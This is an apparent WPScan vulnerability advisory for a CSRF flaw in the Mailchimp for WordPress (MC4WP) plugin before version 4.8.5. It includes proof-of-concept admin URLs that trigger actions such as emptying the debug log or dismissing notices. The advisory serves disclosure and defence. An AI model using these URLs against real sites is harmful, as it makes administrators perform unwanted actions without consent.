WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

MC4WP: Mailchimp for WordPress < 4.8.5 - Unauthorised Actions via CSRF

Description

The plugin did not properly check for CSRF in some of its actions handled by the listen_for_actions method (hooked as admin_init), allowing attackers to make logged in users with the manage_options capability do unwanted actions such as empty the logs, dismiss notice and so on

Proof of Concept

https://example.com/wp-admin/admin.php?_mc4wp_action=empty_debug_log
https://example.com/wp-admin/admin.php?_mc4wp_action=dismiss_review_notice
https://example.com/wp-admin/admin.php?_mc4wp_action=renew_lists_cache
https://example.com/wp-admin/admin.php?_mc4wp_action=dismiss_api_key_notice

Affects Plugins

mailchimp-for-wp
Fixed in version 4.8.5

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
e84e1fa5-a947-4b2c-a134-19e9b07385b4

Timeline

Publicly Published

2021-06-01 (about 1 years ago)

Added

2021-06-01 (about 1 years ago)

Last Updated

2021-06-01 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin